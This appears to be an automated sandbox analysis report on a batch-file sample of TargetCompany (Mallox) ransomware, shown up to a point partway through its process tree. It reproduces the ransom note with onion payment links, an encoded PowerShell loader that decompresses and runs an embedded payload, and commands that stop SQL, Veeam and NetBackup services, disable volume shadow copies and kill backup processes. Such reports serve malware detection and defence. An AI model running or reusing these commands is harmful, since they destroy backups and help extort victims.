Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
63s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
-
submitted
11/02/2025, 06:41
General
-
Target
3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat
-
Size
1.3MB
-
MD5
659dc2c8af5180c5465f0e04e7334aed
-
SHA1
a3e075c9d36c0077471f7034696af4c660630d9b
-
SHA256
3b8a2bcd9e8dd805793cc95c74d30f20ebc5714ea249d165afac29d1f3b0ace0
-
SHA512
fc632f58f30f6170387c1eb003c3b43656de2f9f97bc4564f00ac5b8a9e4fd1348f2448a07439b32c7e34c3a2020f36cce15aa85bf5f9e7f3a146ac8be431025
-
SSDEEP
24576:7RPcg9zh88jZh8Domk9NGL9oj2cZhm5gbwj0VaIx/a53/RI2g+B5i4/c3B:1Pcbc3rG5oj2cZhMg9/yqqqB
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\3D Objects\FILE RECOVERY.txt
Family
targetcompany
Ransom Note
Hello
Your files are encrypted and can not be used
To return your files in work condition you need decryption tool
Follow the instructions to decrypt all your data
Do not try to change or restore files yourself, this will break them
If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB
How to get decryption tool:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field. Your Private key: 3D2CDE4B4FFF691780AE2249
5) You will see payment information and we can make free test decryption here
Our blog of leaked companies:
wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
If you are unable to contact us through the site, then you can email us: [email protected]
Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. �
Emails
URLs
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Disables service(s) 3 TTPs
-
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
Targetcompany family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (3628) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file 1 IoCs
-
Modifies service settings 1 TTPs
Alters the configuration of existing services.
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat.exe2⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat.exeC:\Users\Admin\AppData\Local\Temp\3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bwmeldokiller.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "SQLSERVERAGENT"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLBrowser"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLTELEMETRY"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MsDtsServer130"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MsDtsServer130"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SSISTELEMETRY130"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SSISTELEMETRY130"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLWrite"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLWrite"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL$VEEAMSQL2012"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent$VEEAMSQL2012"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLServerADHelper100"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLServerOLAPService"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MsDtsServer100"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "ReportServer"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ReportServer"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLTELEMETRY$HL"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$HL"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TMBMServer"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TMBMServer"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL$PROGID"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROGID"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL$WOLTERSKLUWER"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL$WOLTERSKLUWER"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent$PROGID"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROGID"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent$WOLTERSKLUWER"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent$WOLTERSKLUWER"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLFDLauncher$OPTIMA"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$OPTIMA"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL$OPTIMA"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL$OPTIMA"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent$OPTIMA"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent$OPTIMA"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "ReportServer$OPTIMA"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ReportServer$OPTIMA"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "msftesql$SQLEXPRESS"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "msftesql$SQLEXPRESS"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "postgresql-x64-9.4"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "postgresql-x64-9.4"6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config "MSSQLFDLauncher" start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config "SQLSERVERAGENT" start= disabled5⤵
-
-
C:\Windows\SysWOW64\sc.exesc config "SQLBrowser" start= disabled5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""4⤵
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled5⤵
-
-
C:\Windows\SysWOW64\sc.exesc config "SQL Server (MSSQLSERVER)" start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$ start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop SQLSERVERAGENT5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop vss5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vss6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config vss start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop vmvss5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vmvss6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config vmvss start=disabled5⤵
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$FE_EXPRESS start= disabled5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$RE_EXPRESS5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$RE_EXPRESS6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLANYs_Sage_FAS_Fixed_Assets5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLANYs_Sage_FAS_Fixed_Assets6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VIM_SQLEXP5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VIM_SQLEXP6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$VIM_SQLEXP start=disabled5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLFDLauncher"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLSERVER"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.BrokerService.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.CatalogDataService.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.CloudService.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.Manager.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.MountService.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.Service.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Backup.WmiServer.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Veeam.Guest.Interaction.Proxy.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentSvc.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sqlbrowser.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sqlceip.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sqlservr.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sqlwriter.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sqlagentc.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ReportingServicesService.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Ssms.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM fdhost.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM fdlauncher.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MsDtsSrvr.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msmdsrv.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mysql.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mysqld.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM w3wp.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM wsusservice.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SageCSClient.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Launchpad.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM dbsrv12.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM EXCEL.EXE5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM OUTLOOK.EXE5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM WINWORD.EXE5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM OneDrive.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TaskService.exe5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "MSOLAP$SHOPCONTROL9"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQL$SHOPCONTROL9"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MSSQLFDLauncher$SHOPCONTROL9"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "ReportServer$SHOPCONTROL9"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ReportServer$SHOPCONTROL9"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLAgent$SHOPCONTROL9"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHOPCONTROL9"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup Client Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup Client Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup Discovery Framework"5⤵
-
